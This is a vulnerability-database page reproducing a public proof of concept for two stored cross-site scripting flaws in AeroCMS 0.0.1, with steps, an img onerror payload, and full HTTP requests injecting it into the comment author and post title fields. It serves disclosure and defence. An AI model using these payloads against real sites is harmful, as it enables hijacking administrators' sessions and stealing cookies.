Vulners
Lucene search
AeroCMS 0.0.1 Cross Site Scripting
🗓️ 08 Apr 2022 00:00:00Reported by D4rkP0w4r, raw.githubusercontent.comType 
packetstorm🔗 packetstormsecurity.com👁 414 Views
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
 | AeroCMS 0.0.1 Cross Site Scripting Vulnerability | 8 Apr 202200:00 | – | zdt |
 | CVE-2022-27063 | 8 Apr 202209:15 | – | attackerkb |
| CVE-2022-27062 | 8 Apr 202209:15 | – | attackerkb |
 | CVE-2022-27062 | 8 Apr 202212:38 | – | circl |
| CVE-2022-27063 | 8 Apr 202212:38 | – | circl |
 | AeroCMS 跨站脚本漏洞 | 8 Apr 202200:00 | – | cnnvd |
| AeroCMS 跨站脚本漏洞 | 8 Apr 202200:00 | – | cnnvd |
 | AeroCMS Cross-Site Scripting Vulnerability (CNVD-2022-30784) | 14 Apr 202200:00 | – | cnvd |
| AeroCMS Cross-Site Scripting Vulnerability | 14 Apr 202200:00 | – | cnvd |
 | CVE-2022-27062 | 8 Apr 202208:23 | – | cve |
10
`# AeroCMS-Comment-Stored_XSS-POC
# Author: D4rkP0w4r
* Note => Don't need register or login account
* Description => Stored_XSS at comment box
## Step to Reproduct
* Click Read More -> input payload <img/src/onerror=prompt(10)> at Author -> click Submit button
# Exploit
* Input payload at Author -> click Submit button
* When admin login to admin panel and click Comments -> The XSS will trigger
* Finally, Success !!!!
# Vulnerable Code
* view_all_comments.php
* Stored xss in comment section
* Impact is to get the cookie and execute the js code in the admin panel
* Because Comments are displayed in admin panel
* post.php
* No encoding is implemented when inserting data to database
# POC
* Injection Point
comment_author=%3Cimg%2Fsrc%2Fonerror%3Dprompt%2810%29%3E&comment_email=bin%40gmail.com&comment_content=hacked&create_comment=
* Request
POST /AeroCMS/post.php?p_id=36 HTTP/1.1
Host: localhost:8080
Content-Length: 126
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/AeroCMS/post.php?p_id=36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=loqbt1ibs376hge1s415srq441
Connection: close
comment_author=%3Cimg%2Fsrc%2Fonerror%3Dprompt%2810%29%3E&comment_email=bin%40gmail.com&comment_content=hacked&create_comment=
POC VIDEO https://drive.google.com/file/d/1GxOyX1JkG0trfdaCLfe06TR6WLIGoUXE/view?usp=sharing
----
# AeroCMS-Add_Posts-Stored_XSS-Poc
* Description => Stored_XSS at Post Title
## Step to Reproduct
* Login to admin panel -> Posts -> Add Posts -> Post Title -> inject payload <img/src/onerror=prompt(10)> -> The XSS will trigger when clicked Edit Post button
## Vulnerable Code
* add_post.php
When inserting into the database, the input is not filtered out of html characters
* post.php
Even when displaying, the entity cannot be properly encoded
-------------------------------------------------------------
# POC
* Injection Point
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_title"
<img/src/onerror=prompt(10)>
* Request
POST http://localhost:8080/AeroCMS/admin/posts.php?source=edit_post&p_id=26 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------85448121341942511952219062291
Content-Length: 1101
Origin: http://localhost:8080
Connection: keep-alive
Referer: http://localhost:8080/AeroCMS/admin/posts.php?source=edit_post&p_id=26
Cookie: Phpstorm-6b6ba5ee=79a50460-3b02-4cde-a5a4-ff6883c16a7b; PHPSESSID=ndh6ks953tmha1ps8cfp4bplf2
Upgrade-Insecure-Requests: 1
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_title"
<img/src/onerror=prompt(10)>
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_category_id"
1
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_user"
admin
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_status"
published
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_tags"
1
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_content"
<p>111</p>
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="update_post"
Edit Post
-----------------------------85448121341942511952219062291--
POC VIDEO
https://drive.google.com/file/d/1kMGPBLKgefvKZj34QxDlPTxXdcT0kRR_/view?usp=sharing
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Apr 2022 00:00Current
5.7Medium risk
Vulners AI Score5.7
EPSS0.007